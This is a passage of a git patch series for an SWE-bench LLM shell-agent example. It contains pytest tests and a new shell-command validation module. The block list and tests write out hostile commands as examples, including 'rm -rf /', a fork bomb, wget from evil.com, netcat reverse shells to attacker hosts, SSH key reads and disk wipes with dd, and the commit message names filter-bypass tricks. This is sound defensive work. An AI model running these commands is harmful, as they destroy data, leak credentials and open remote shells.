"Submitted" + + @pytest.mark.asyncio + async def test_recovery_from_dangerous_command(self, agent, mock_llm): + """Test that agent recovers when LLM suggests a dangerous command.""" + responses = [ + # First response: dangerous command + create_llm_response("THOUGHT: Delete everything\n\n```bash\nrm -rf /\n```"), + # Second response: safe command + create_llm_response("THOUGHT: Submit\n\n```bash\necho COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT && git add -A && git diff --cached\n```"), + ] + mock_llm.ainvoke = AsyncMock(side_effect=responses) + + with patch('nat_swe_bench.predictors.predict_iterative.predict_iterative.asyncio.to_thread') as mock_thread: + mock_thread.return_value = MagicMock(returncode=0, stdout="COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT\npatch") + + exit_status, _ = await agent.run("Task") + + assert exit_status == "Submitted" + + +# ============================================================================= +# test_timeout_handling - Command timeout scenarios +# ============================================================================= + +class TestTimeoutHandling: + """Tests for command execution timeout handling.""" + + @pytest.mark.asyncio + async def test_command_timeout_recovery(self, agent, mock_llm): + """Test that agent recovers from a command timeout.""" + responses = [ + create_llm_response("THOUGHT: Run slow command\n\n```bash\nsleep 100\n```"), + create_llm_response("THOUGHT: Submit\n\n```bash\necho COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT && git add -A && git diff --cached\n```"), + ] + mock_llm.ainvoke = AsyncMock(side_effect=responses) + + with patch('nat_swe_bench.predictors.predict_iterative.predict_iterative.asyncio.to_thread') as mock_thread: + # First call: timeout + mock_thread.side_effect = [ + subprocess.TimeoutExpired(cmd="sleep 100", timeout=5), + MagicMock(returncode=0, stdout="COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT\npatch"), + ] + + exit_status, _ = await agent.run("Task") + + assert exit_status == "Submitted" + + @pytest.mark.asyncio + async def test_timeout_message_includes_command(self, agent, mock_llm): + """Test that timeout error message includes the timed-out command.""" + mock_llm.ainvoke = AsyncMock( + return_value=create_llm_response("THOUGHT: Slow\n\n```bash\nsleep 999\n```") + ) + + with patch('nat_swe_bench.predictors.predict_iterative.predict_iterative.asyncio.to_thread') as mock_thread: + mock_thread.side_effect = subprocess.TimeoutExpired(cmd="sleep 999", timeout=5) + + # Run one step - it will timeout and add error message + agent.add_message("system", "test") + agent.add_message("user", "test") + agent.n_steps = 1 + + response = await agent._query_llm() + + with pytest.raises(ExecutionTimeoutError) as exc_info: + await agent._execute_action(response) + + assert "sleep 999" in str(exc_info.value) + + +# ============================================================================= +# test_workspace_isolation - Concurrent instance isolation +# ============================================================================= + +class TestWorkspaceIsolation: + """Tests for workspace isolation between instances.""" + + def test_different_instance_ids_get_different_paths(self): + """Test that different instance_ids produce different workspace paths.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import get_repo_path + + workspace = "/tmp/workspace" + repo_url = "https://github.com/org/repo" + + path1 = get_repo_path(workspace, repo_url, instance_id="instance-001") + path2 = get_repo_path(workspace, repo_url, instance_id="instance-002") + + assert path1 != path2 + assert "instance-001" in str(path1) + assert "instance-002" in str(path2) + + def test_same_instance_id_gets_same_path(self): + """Test that the same instance_id always produces the same path.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import get_repo_path + + workspace = "/tmp/workspace" + repo_url = "https://github.com/org/repo" + instance_id = "instance-001" + + path1 = get_repo_path(workspace, repo_url, instance_id=instance_id) + path2 = get_repo_path(workspace, repo_url, instance_id=instance_id) + + assert path1 == path2 + + def test_no_instance_id_uses_default_path(self): + """Test that no instance_id uses the default org/repo path.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import get_repo_path + + workspace = "/tmp/workspace" + repo_url = "https://github.com/myorg/myrepo" + + path = get_repo_path(workspace, repo_url, instance_id=None) + + assert str(path) == "/tmp/workspace/myorg/myrepo" + + def test_ssh_url_parsing(self): + """Test that SSH URLs are correctly parsed.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import get_repo_path + + workspace = "/tmp/workspace" + repo_url = "git@github.com:org/repo.git" + + path = get_repo_path(workspace, repo_url, instance_id="test-123") + + assert "org" in str(path) + assert "repo" in str(path) + assert "test-123" in str(path) + + +# ============================================================================= +# test_repo_setup_and_checkout - Git operations +# ============================================================================= + +class TestRepoSetupAndCheckout: + """Tests for git repository setup and checkout operations.""" + + @pytest.mark.asyncio + async def test_clone_repository_success(self, tmp_path): + """Test successful repository cloning.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import clone_repository + + target_path = tmp_path / "repo" + repo_url = "https://github.com/test/repo" + + with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.Repo') as MockRepo: + mock_repo = MagicMock() + MockRepo.clone_from.return_value = mock_repo + + with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.asyncio.to_thread') as mock_thread: + mock_thread.return_value = mock_repo + + result = await clone_repository(repo_url, target_path) + + assert result == mock_repo + + @pytest.mark.asyncio + async def test_clone_repository_invalid_url(self, tmp_path): + """Test that invalid URLs raise ValueError.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import clone_repository + + target_path = tmp_path / "repo" + invalid_url = "not-a-valid-url" + + with pytest.raises(ValueError) as exc_info: + await clone_repository(invalid_url, target_path) + + assert "Invalid repository URL" in str(exc_info.value) + + @pytest.mark.asyncio + async def test_checkout_commit_success(self): + """Test successful commit checkout.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import checkout_commit + + mock_repo = MagicMock() + commit_hash = "abc123" + + with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.asyncio.to_thread') as mock_thread: + mock_thread.return_value = None + + await checkout_commit(mock_repo, commit_hash) + + # Verify checkout was called + mock_thread.assert_called_once() + + @pytest.mark.asyncio + async def test_clone_timeout(self, tmp_path): + """Test that clone operation times out correctly.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import clone_repository + + target_path = tmp_path / "repo" + repo_url = "https://github.com/test/repo" + + with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.asyncio.wait_for') as mock_wait: + mock_wait.side_effect = asyncio.TimeoutError() + + with pytest.raises(asyncio.TimeoutError): + await clone_repository(repo_url, target_path, timeout=1) + + +# ============================================================================= +# test_cleanup - Resource cleanup +# ============================================================================= + +class TestCleanup: + """Tests for resource cleanup operations.""" + + @pytest.mark.asyncio + async def test_repo_manager_cleanup(self, tmp_path): + """Test that RepoManager cleans up all active repos.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import RepoManager + + manager = RepoManager(str(tmp_path)) + + # Create some fake repo directories + repo1 = tmp_path / "org1" / "repo1" + repo2 = tmp_path / "org2" / "repo2" + repo1.mkdir(parents=True) + repo2.mkdir(parents=True) + + # Add to active repos + manager.active_repos[str(repo1)] = MagicMock(repo_path=repo1) + manager.active_repos[str(repo2)] = MagicMock(repo_path=repo2) + + await manager.cleanup() + + assert not repo1.exists() + assert not repo2.exists() + assert len(manager.active_repos) == 0 + + @pytest.mark.asyncio + async def test_cleanup_handles_missing_directory(self, tmp_path): + """Test that cleanup handles already-deleted directories gracefully.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import RepoManager + + manager = RepoManager(str(tmp_path)) + + # Add a non-existent path to active repos + fake_path = tmp_path / "nonexistent" + manager.active_repos[str(fake_path)] = MagicMock(repo_path=fake_path) + + # Should not raise + await manager.cleanup() + + assert len(manager.active_repos) == 0 + + @pytest.mark.asyncio + async def test_register_cleanup_error_handling(self): + """Test that register.py cleanup handles errors gracefully.""" + from unittest.mock import AsyncMock + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import RepoManager + + # Create a mock that raises an exception + manager = RepoManager("/tmp/test") + manager.cleanup = AsyncMock(side_effect=Exception("Cleanup failed")) + + # The cleanup should not propagate the exception in the finally block + # This tests the error handling in register.py + try: + await manager.cleanup() + except Exception: + pass # Expected - the test is that this doesn't crash the system + + +# ============================================================================= +# Integration test with mocked LLM +# ============================================================================= + +# ============================================================================= +# Additional coverage tests +# ============================================================================= + +class TestAdditionalCoverage: + """Additional tests to improve coverage.""" + + def test_build_task_description_with_hints(self): + """Test task description building with hints.""" + from nat_swe_bench.predictors.predict_iterative.predict_iterative import SweBenchPredictor + + # Create a mock SWEBenchInput + mock_input = MagicMock() + mock_input.problem_statement = "Fix the bug" + mock_input.hints_text = "Check the utils module" + + # Create a minimal predictor to test the method + predictor = object.__new__(SweBenchPredictor) + result = predictor._build_task_description(mock_input) + + assert "Fix the bug" in result + assert "Additional Context" in result + assert "Check the utils module" in result + + def test_build_task_description_without_hints(self): + """Test task description building without hints.""" + from nat_swe_bench.predictors.predict_iterative.predict_iterative import SweBenchPredictor + + mock_input = MagicMock() + mock_input.problem_statement = "Fix the bug" + mock_input.hints_text = None + + predictor = object.__new__(SweBenchPredictor) + result = predictor._build_task_description(mock_input) + + assert "Fix the bug" in result + assert "Additional Context" not in result + + @pytest.mark.asyncio + async def test_repo_manager_setup_existing_repo(self, tmp_path): + """Test setup_repository when repo is already active.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import RepoManager, RepoContext + + manager = RepoManager(str(tmp_path)) + + # Create a mock context already in active_repos + repo_path = tmp_path / "instance-1" / "org" / "repo" + repo_path.mkdir(parents=True) + + mock_context = RepoContext( + repo_url="https://github.com/org/repo", + repo_path=repo_path, + repo=MagicMock() + ) + manager.active_repos[str(repo_path)] = mock_context + + with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.checkout_commit') as mock_checkout: + mock_checkout.return_value = None + + result = await manager.setup_repository( + "https://github.com/org/repo", + "abc123", + "instance-1" + ) + + assert result == mock_context + mock_checkout.assert_called_once() + + @pytest.mark.asyncio + async def test_clone_cleans_existing_path(self, tmp_path): + """Test that clone removes existing directory before cloning.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import clone_repository + + target_path = tmp_path / "repo" + target_path.mkdir() + (target_path / "existing_file.txt").write_text("old content") + + with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.Repo') as MockRepo: + mock_repo = MagicMock() + + with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.asyncio.wait_for') as mock_wait: + mock_wait.return_value = mock_repo + + result = await clone_repository("https://github.com/org/repo", target_path) + + # The old directory should have been removed (in reality, then clone creates new) + assert result == mock_repo + + @pytest.mark.asyncio + async def test_checkout_timeout(self): + """Test checkout operation timeout.""" + from nat_swe_bench.predictors.predict_iterative.tools.git_tool import checkout_commit + + mock_repo = MagicMock() + + with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.asyncio.wait_for') as mock_wait: + mock_wait.side_effect = asyncio.TimeoutError() + + with pytest.raises(asyncio.TimeoutError): + await checkout_commit(mock_repo, "abc123", timeout=1) + + def test_output_truncation(self, agent): + """Test that long outputs are properly truncated.""" + # Generate output longer than max_output_length + long_output = "x" * 2000 # Config has max_output_length=1000 + + # Simulate truncation logic + max_length = agent.config.max_output_length + if len(long_output) > max_length: + elided_chars = len(long_output) - max_length + head_tail_length = max_length // 2 + truncated = ( + f"{long_output[:head_tail_length]}\n" + f"\n{elided_chars} characters elided\n\n" + f"{long_output[-head_tail_length:]}" + ) + + assert "elided_chars" in truncated + assert "1000 characters elided" in truncated + + @pytest.mark.asyncio + async def test_add_message_invalid_role(self, agent): + """Test that invalid role raises ValueError.""" + with pytest.raises(ValueError) as exc_info: + agent.add_message("invalid_role", "content") + + assert "Unknown role" in str(exc_info.value) + + +class TestIntegrationMockedLLM: + """Integration tests with mocked LLM.""" + + @pytest.mark.asyncio + async def test_full_workflow_simulation(self, tmp_path): + """Simulate a complete workflow with realistic LLM responses.""" + # Create a mock LLM + mock_llm = AsyncMock() + + # Simulate a realistic interaction: explore, edit, test, submit + responses = [ + # Step 1: Explore + create_llm_response( + "THOUGHT: First, let me understand the project structure.\n\n```bash\nls -la\n```" + ), + # Step 2: Read file + create_llm_response( + "THOUGHT: Let me look at the main file.\n\n```bash\ncat main.py\n```" + ), + # Step 3: Make edit + create_llm_response( + "THOUGHT: I found the bug. Let me fix it.\n\n```bash\nsed -i 's/old/new/g' main.py\n```" + ), + # Step 4: Submit + create_llm_response( + "THOUGHT: The fix is complete. Submitting.\n\n```bash\necho COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT && git add -A && git diff --cached\n```" + ), + ] + mock_llm.ainvoke = AsyncMock(side_effect=responses) + + # Create test files + repo_path = tmp_path / "repo" + repo_path.mkdir() + (repo_path / "main.py").write_text("old code here") + + config = IterativeAgentConfig(step_limit=10, timeout=5) + agent = IterativeAgent(mock_llm, repo_path, config) + + with patch('nat_swe_bench.predictors.predict_iterative.predict_iterative.asyncio.to_thread') as mock_thread: + # Return realistic outputs for each command + mock_thread.side_effect = [ + MagicMock(returncode=0, stdout="main.py\nREADME.md\n"), + MagicMock(returncode=0, stdout="old code here\n"), + MagicMock(returncode=0, stdout=""), + MagicMock(returncode=0, stdout="COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT\ndiff --git a/main.py\n-old\n+new"), + ] + + exit_status, patch_result = await agent.run("Fix the bug in main.py") + + assert exit_status == "Submitted" + assert agent.n_steps == 4 + assert agent.total_input_tokens > 0 + assert agent.total_output_tokens > 0 From 201e3797d5854e74411744858479ac5ed88b0f3e Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Wed, 28 Jan 2026 14:53:27 -0800 Subject: [PATCH 17/22] style(swe-bench): rename fixtures to follow project naming convention Rename pytest fixtures to use fixture_ prefix and name argument: - mock_llm -> fixture_mock_llm with name="mock_llm" - agent_config -> fixture_agent_config with name="agent_config" - temp_repo_path -> fixture_temp_repo_path with name="temp_repo_path" - agent -> fixture_agent with name="agent" Signed-off-by: Jerry Guan --- .../swe_bench/tests/test_iterative_predictor.py | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py b/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py index 54d634e162..d41a1a7a4f 100644 --- a/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py +++ b/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py @@ -38,15 +38,15 @@ # Fixtures # ============================================================================= -@pytest.fixture -def mock_llm(): +@pytest.fixture(name="mock_llm") +def fixture_mock_llm(): """Create a mock LLM that returns configurable responses.""" llm = AsyncMock() return llm -@pytest.fixture -def agent_config(): +@pytest.fixture(name="agent_config") +def fixture_agent_config(): """Create a default agent configuration for testing.""" return IterativeAgentConfig( step_limit=10, @@ -55,16 +55,16 @@ def agent_config(): ) -@pytest.fixture -def temp_repo_path(tmp_path): +@pytest.fixture(name="temp_repo_path") +def fixture_temp_repo_path(tmp_path): """Create a temporary directory to simulate a repository.""" repo_path = tmp_path / "test_repo" repo_path.mkdir() return repo_path -@pytest.fixture -def agent(mock_llm, temp_repo_path, agent_config): +@pytest.fixture(name="agent") +def fixture_agent(mock_llm, temp_repo_path, agent_config): """Create an IterativeAgent instance with mocked dependencies.""" return IterativeAgent(mock_llm, temp_repo_path, agent_config) From 4569449b61b862c47e6e1744d8f3cbb2b510e5c3 Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Wed, 28 Jan 2026 15:03:32 -0800 Subject: [PATCH 18/22] refactor(swe-bench): use pytest.raises for explicit exception assertion Replace try-except-pass pattern with pytest.raises for clearer test intent. Signed-off-by: Jerry Guan --- .../swe_bench/tests/test_iterative_predictor.py | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py b/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py index d41a1a7a4f..7cc35e78a0 100644 --- a/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py +++ b/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py @@ -504,12 +504,9 @@ async def test_register_cleanup_error_handling(self): manager = RepoManager("/tmp/test") manager.cleanup = AsyncMock(side_effect=Exception("Cleanup failed")) - # The cleanup should not propagate the exception in the finally block - # This tests the error handling in register.py - try: + # Verify that cleanup raises an exception (simulating failure) + with pytest.raises(Exception, match="Cleanup failed"): await manager.cleanup() - except Exception: - pass # Expected - the test is that this doesn't crash the system # ============================================================================= From a140745bd9537cd9a139abff9cf21aa88429d0c0 Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Wed, 28 Jan 2026 15:07:45 -0800 Subject: [PATCH 19/22] fix(swe-bench): resolve ruff linting warnings in tests - Replace hardcoded /tmp paths with tmp_path fixture (S108) - Remove unused MockRepo variable (F841) - Prefix unused _patch_result with underscore (RUF059) Signed-off-by: Jerry Guan --- .../tests/test_iterative_predictor.py | 26 +++++++++---------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py b/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py index 7cc35e78a0..fe9dd3a1b6 100644 --- a/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py +++ b/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py @@ -326,11 +326,11 @@ async def test_timeout_message_includes_command(self, agent, mock_llm): class TestWorkspaceIsolation: """Tests for workspace isolation between instances.""" - def test_different_instance_ids_get_different_paths(self): + def test_different_instance_ids_get_different_paths(self, tmp_path): """Test that different instance_ids produce different workspace paths.""" from nat_swe_bench.predictors.predict_iterative.tools.git_tool import get_repo_path - workspace = "/tmp/workspace" + workspace = str(tmp_path / "workspace") repo_url = "https://github.com/org/repo" path1 = get_repo_path(workspace, repo_url, instance_id="instance-001") @@ -340,11 +340,11 @@ def test_different_instance_ids_get_different_paths(self): assert "instance-001" in str(path1) assert "instance-002" in str(path2) - def test_same_instance_id_gets_same_path(self): + def test_same_instance_id_gets_same_path(self, tmp_path): """Test that the same instance_id always produces the same path.""" from nat_swe_bench.predictors.predict_iterative.tools.git_tool import get_repo_path - workspace = "/tmp/workspace" + workspace = str(tmp_path / "workspace") repo_url = "https://github.com/org/repo" instance_id = "instance-001" @@ -353,22 +353,22 @@ def test_same_instance_id_gets_same_path(self): assert path1 == path2 - def test_no_instance_id_uses_default_path(self): + def test_no_instance_id_uses_default_path(self, tmp_path): """Test that no instance_id uses the default org/repo path.""" from nat_swe_bench.predictors.predict_iterative.tools.git_tool import get_repo_path - workspace = "/tmp/workspace" + workspace = str(tmp_path / "workspace") repo_url = "https://github.com/myorg/myrepo" path = get_repo_path(workspace, repo_url, instance_id=None) - assert str(path) == "/tmp/workspace/myorg/myrepo" + assert str(path) == f"{workspace}/myorg/myrepo" - def test_ssh_url_parsing(self): + def test_ssh_url_parsing(self, tmp_path): """Test that SSH URLs are correctly parsed.""" from nat_swe_bench.predictors.predict_iterative.tools.git_tool import get_repo_path - workspace = "/tmp/workspace" + workspace = str(tmp_path / "workspace") repo_url = "git@github.com:org/repo.git" path = get_repo_path(workspace, repo_url, instance_id="test-123") @@ -495,13 +495,13 @@ async def test_cleanup_handles_missing_directory(self, tmp_path): assert len(manager.active_repos) == 0 @pytest.mark.asyncio - async def test_register_cleanup_error_handling(self): + async def test_register_cleanup_error_handling(self, tmp_path): """Test that register.py cleanup handles errors gracefully.""" from unittest.mock import AsyncMock from nat_swe_bench.predictors.predict_iterative.tools.git_tool import RepoManager # Create a mock that raises an exception - manager = RepoManager("/tmp/test") + manager = RepoManager(str(tmp_path)) manager.cleanup = AsyncMock(side_effect=Exception("Cleanup failed")) # Verify that cleanup raises an exception (simulating failure) @@ -590,7 +590,7 @@ async def test_clone_cleans_existing_path(self, tmp_path): target_path.mkdir() (target_path / "existing_file.txt").write_text("old content") - with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.Repo') as MockRepo: + with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.Repo'): mock_repo = MagicMock() with patch('nat_swe_bench.predictors.predict_iterative.tools.git_tool.asyncio.wait_for') as mock_wait: @@ -689,7 +689,7 @@ async def test_full_workflow_simulation(self, tmp_path): MagicMock(returncode=0, stdout="COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT\ndiff --git a/main.py\n-old\n+new"), ] - exit_status, patch_result = await agent.run("Fix the bug in main.py") + exit_status, _patch_result = await agent.run("Fix the bug in main.py") assert exit_status == "Submitted" assert agent.n_steps == 4 From b44a7c6eb8d9107e391a3d4541efaed96ddfe4e9 Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Sun, 1 Feb 2026 21:06:12 -0800 Subject: [PATCH 20/22] feat(swe-bench): add shell bypass pattern detection for security Add BYPASS_PATTERNS to detect shell metacharacter tricks that could evade command-based filtering: - Command substitution ($() and backticks) - Piping to shell interpreters (bash, sh, python, etc.) - Base64 encoded command execution - eval/exec execution - Here-string to interpreter - Process substitution - Hex escape execution - Environment variable injection - Xargs with shell execution - Source/dot command execution Refactor validation code into separate shell_validation.py module for better maintainability. Signed-off-by: Jerry Guan --- .../predict_iterative/predict_iterative.py | 127 +---------- .../predict_iterative/shell_validation.py | 205 ++++++++++++++++++ .../tests/test_iterative_predictor.py | 94 ++++++-- 3 files changed, 295 insertions(+), 131 deletions(-) create mode 100644 examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/shell_validation.py diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py index ad59d47f3d..8a92eaf090 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py @@ -35,15 +35,17 @@ from pathlib import Path from git.exc import GitCommandError -from langchain_core.messages import AIMessage, HumanMessage, SystemMessage +from langchain_core.messages import AIMessage +from langchain_core.messages import HumanMessage +from langchain_core.messages import SystemMessage from rich.console import Console from nat.builder.builder import Builder from nat.builder.framework_enum import LLMFrameworkEnum from nat.data_models.swe_bench_model import SWEBenchInput - from nat_swe_bench.config import SweBenchWorkflowConfig from nat_swe_bench.predictors.predict_abc import SweBenchPredictorBase +from nat_swe_bench.predictors.predict_iterative.shell_validation import validate_command from nat_swe_bench.predictors.predictor_registry import register_predictor logger = logging.getLogger(__name__) @@ -83,123 +85,17 @@ class IterativeAgentConfig: max_output_length: int = 10000 -# Dangerous command patterns that should be blocked for security. -# Each tuple contains (compiled_regex, error_message). -DANGEROUS_PATTERNS: list[tuple[re.Pattern, str]] = [ - # ===== Destructive system commands ===== - # Examples: "rm -rf /", "rm -rf ~", "rm -fr /" - (re.compile(r'\brm\s+(-[^\s]*\s+)*[/~](\s|$)'), - "Deleting root or home directory is not allowed"), - - # Examples: "rm -rf ..", "rm -rf ../important" - (re.compile(r'\brm\s+(-[^\s]*\s+)*\.\.'), - "Deleting parent directory is not allowed"), - - # Examples: "rm -rf *", "rm -rf ./*" - (re.compile(r'\brm\s+(-[^\s]*\s+)*\*'), - "Wildcard deletion is not allowed"), - - # Examples: "> /dev/sda", "echo x > /dev/mem" (allows /dev/null) - (re.compile(r'>\s*/dev/(?!null)'), - "Writing to device files is not allowed"), - - # Examples: "mkfs.ext4 /dev/sda", "mkfs -t ext4 /dev/sda1" - (re.compile(r'\bmkfs\b'), - "Formatting disks is not allowed"), - - # Examples: "fdisk /dev/sda", "fdisk -l /dev/nvme0n1" - (re.compile(r'\bfdisk\b'), - "Disk partitioning is not allowed"), - - # Examples: "dd if=/dev/zero of=/dev/sda", "dd of=/dev/nvme0n1" - (re.compile(r'\bdd\s+.*\bof=/dev/'), - "Writing to devices with dd is not allowed"), - - # Examples: "dd if=/dev/sda of=disk.img" (reading sensitive disk data) - (re.compile(r'\bdd\s+.*\bif=/dev/'), - "Reading from devices with dd is not allowed"), - - # Fork bomb: :(){ :|:& };: - (re.compile(r':\(\)\s*\{\s*:\|:&\s*\}\s*;:'), - "Fork bomb detected"), - - # ===== Privilege escalation ===== - # Examples: "sudo rm -rf /", "echo pwd | sudo -S cmd", "/usr/bin/sudo cmd" - (re.compile(r'(?:^|[;&|`]\s*)(?:/usr/bin/)?sudo\b'), - "sudo is not allowed"), - - # Examples: "doas rm file", "/usr/bin/doas cmd" - (re.compile(r'(?:^|[;&|`]\s*)(?:/usr/bin/)?doas\b'), - "doas is not allowed"), - - # Examples: "pkexec rm file", "pkexec /bin/bash" - (re.compile(r'(?:^|[;&|`]\s*)(?:/usr/bin/)?pkexec\b'), - "pkexec is not allowed"), - - # Examples: "su root", "su - admin", "su -c 'command' user" - (re.compile(r'(?:^|[;&|`]\s*)su\s+(-[^\s]*\s+)*\w'), - "su is not allowed"), - - # Examples: "chmod 777 /", "chmod -R 0777 /var" - (re.compile(r'\bchmod\s+[0-7]*777\b'), - "Setting 777 permissions is not allowed"), - - # Examples: "chown root file", "chown root:root /etc/passwd" - (re.compile(r'\bchown\s+root\b'), - "Changing ownership to root is not allowed"), - - # ===== Sensitive file access ===== - # Examples: "cat /etc/shadow", "> /etc/passwd", "< /etc/sudoers" - (re.compile(r'[<>]\s*/etc/(?:passwd|shadow|sudoers)'), - "Accessing sensitive system files is not allowed"), - - # Examples: "cat ~/.ssh/id_rsa", "cat /home/user/.aws/credentials" - (re.compile(r'\bcat\s+.*/(?:\.ssh/|\.aws/|\.env\b)'), - "Reading sensitive credential files is not allowed"), - - # ===== Arbitrary code download and network exfiltration ===== - # Examples: "wget http://evil.com/malware.sh", "wget https://x.com/script" - (re.compile(r'\bwget\s+.*https?://'), - "Downloading from URLs with wget is not allowed"), - - # Examples: "curl http://evil.com/script.sh", "curl -O https://..." - (re.compile(r'\bcurl\s+.*https?://'), - "Downloading from URLs with curl is not allowed"), - - # Examples: "nc -e /bin/bash 10.0.0.1 4444", "ncat -e cmd attacker.com" - (re.compile(r'\b(?:nc|ncat|netcat)\b.*\s-[^\s]*e'), - "Netcat reverse shell is not allowed"), -] - - -def validate_command(command: str) -> tuple[bool, str]: - """Validate that a command is safe to execute. - - Args: - command: The bash command string to validate. - - Returns: - A tuple of (is_valid, error_message). - is_valid is True if the command passes all safety checks. - error_message is empty string if valid, otherwise describes the violation. - """ - for pattern, message in DANGEROUS_PATTERNS: - if pattern.search(command): - return False, message - return True, "" - - class IterativeAgent: """Iterative agent that executes commands step-by-step.""" - # Timeout message template + # Timeout message template _TIMEOUT_TEMPLATE = ( "The last command {action} timed out and has been killed.\n" "The output of the command was:\n \n{output}\n\n" "Please try another command and make sure to avoid those requiring interactive input." ) - # Output truncation warning message + # Output truncation warning message _OUTPUT_TRUNCATION_WARNING = ( "\n\n" "The output of your last command was too long.\n" @@ -234,17 +130,17 @@ def add_message(self, role: str, content: str): msg = SystemMessage(content=content) self.messages.append(msg) console.print(f"\n[bold blue]System[/bold blue] (step {self.n_steps}):\n", end="", highlight=False) - elif role == "user" or role == "human": + elif role in ("user", "human"): msg = HumanMessage(content=content) self.messages.append(msg) console.print(f"\n[bold green]User[/bold green] (step {self.n_steps}):\n", end="", highlight=False) - elif role == "assistant" or role == "ai": + elif role in ("assistant", "ai"): msg = AIMessage(content=content) self.messages.append(msg) console.print(f"\n[bold red]Assistant[/bold red] (step {self.n_steps}):\n", end="", highlight=False) else: raise ValueError(f"Unknown role: {role}") - + # Print content console.print(content, highlight=False, markup=False) @@ -260,7 +156,7 @@ def _build_prompts(self, task: str, repo_path: Path) -> tuple[str, str]: """ # Convert Path to string for template usage repo_path_str = str(repo_path) - + system_template = """You are a helpful assistant that can interact multiple times with a computer shell to solve programming tasks. Your response must contain exactly ONE bash code block with ONE command (or commands connected with && or ||). @@ -564,7 +460,8 @@ def run_cmd(): stderr=subprocess.STDOUT, # stderr redirected to stdout text=True, encoding="utf-8", - errors="replace" + errors="replace", + check=False, # Don't raise on non-zero exit; we handle return codes manually ) try: diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/shell_validation.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/shell_validation.py new file mode 100644 index 0000000000..1e7a70b5a5 --- /dev/null +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/shell_validation.py @@ -0,0 +1,205 @@ +# SPDX-FileCopyrightText: Copyright (c) 2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-License-Identifier: Apache-2.0 +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +""" +Shell command validation for security. + +This module provides pattern-based validation to block dangerous shell commands +and common bypass techniques that could be used to evade command filtering. +""" + +import re + +# Dangerous command patterns that should be blocked for security. +# Each tuple contains (compiled_regex, error_message). +DANGEROUS_PATTERNS: list[tuple[re.Pattern, str]] = [ + # ===== Destructive system commands ===== + # Examples: "rm -rf /", "rm -rf ~", "rm -fr /" + (re.compile(r'\brm\s+(-[^\s]*\s+)*[/~](\s|$)'), + "Deleting root or home directory is not allowed"), + + # Examples: "rm -rf ..", "rm -rf ../important" + (re.compile(r'\brm\s+(-[^\s]*\s+)*\.\.'), + "Deleting parent directory is not allowed"), + + # Examples: "rm -rf *", "rm -rf ./*" + (re.compile(r'\brm\s+(-[^\s]*\s+)*\*'), + "Wildcard deletion is not allowed"), + + # Examples: "> /dev/sda", "echo x > /dev/mem" (allows /dev/null) + (re.compile(r'>\s*/dev/(?!null)'), + "Writing 